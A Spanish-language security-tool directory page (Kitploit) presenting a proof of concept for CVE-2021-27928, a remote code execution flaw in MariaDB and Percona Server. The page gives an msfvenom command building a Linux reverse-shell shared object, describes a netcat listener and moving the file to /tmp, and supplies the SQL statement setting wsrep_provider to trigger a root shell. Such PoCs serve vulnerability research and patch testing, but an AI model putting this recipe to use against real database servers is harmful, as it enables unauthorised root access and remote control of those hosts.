Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-27928-POC — CVE-2021-27928-POC | Kitploit
Herramientas/GitHubGitHub/shamo0/cve-2021-27928-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónSeguridad de Bases de Datos
GitHubshamo0/cve-2021-27928-poc

CVE-2021-27928-POC

CVE-2021-27928-POC

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-27928 POC

Descripción

Se descubrió un problema de ejecución remota de código en MariaDB 10.2 anterior a 10.2.37, 10.3 anterior a 10.3.28, 10.4 anterior a 10.4.18 y 10.5 anterior a 10.5.9; Percona Server hasta 2021-03-03; y el parche wsrep hasta 2021-03-03 para MySQL. Una ruta de búsqueda no confiable conduce a una inyección de eval, en la que un usuario SUPER de la base de datos puede ejecutar comandos del sistema operativo después de modificar wsrep_provider y wsrep_notify_cmd. NOTA: esto no afecta a un producto de Oracle.

POC

Creemos nuestro payload con Msfvenom. Para nuestro payload usaremos /linux/x64/shell_reverse_tcp con nuestra IP para LHOST y el número de puerto para LPORT. También especificaremos el tipo de archivo con -f, que en nuestro caso es elf-so. Y guardaremos el archivo de salida como CVE-2021.27928.so con la opción -o. msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so

¡Nuestro payload está listo! Configuemos un listener con netcat en nuestro puerto especificado.

Movamos nuestro archivo a la máquina objetivo. Para esto podemos usar cualquier método que prefiramos. Yo usaré el servidor http de python.

Guardemos el archivo en el directorio /tmp

Ahora necesitamos iniciar sesión en la base de datos y establecer wsrep_provider a nuestro payload subido.

SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

Es hora de revisar nuestro listener. Si tuvimos éxito, ¡deberíamos haber obtenido una shell root en la máquina!

¡Feliz hacking!

Referencias

https://www.exploit-db.com/exploits/49765

https://nvd.nist.gov/vuln/detail/CVE-2021-27928

Descargar herramienta